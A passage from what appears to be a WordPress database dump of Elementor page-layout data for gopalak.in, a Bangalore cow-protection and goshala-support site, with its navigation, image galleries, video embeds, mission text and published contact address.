settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10607,1763,'_elementor_page_assets','a:0:{}'),(10609,1764,'_elementor_edit_mode','builder'),(10610,1764,'_elementor_template_type','wp-page'),(10611,1764,'_elementor_version','3.7.8'),(10612,1764,'_wp_page_template','elementor_canvas'),(10613,1764,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10614,1764,'_elementor_page_assets','a:0:{}'),(10616,1765,'_elementor_edit_mode','builder'),(10617,1765,'_elementor_template_type','wp-page'),(10618,1765,'_elementor_version','3.7.8'),(10619,1765,'_wp_page_template','elementor_canvas'),(10620,1765,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"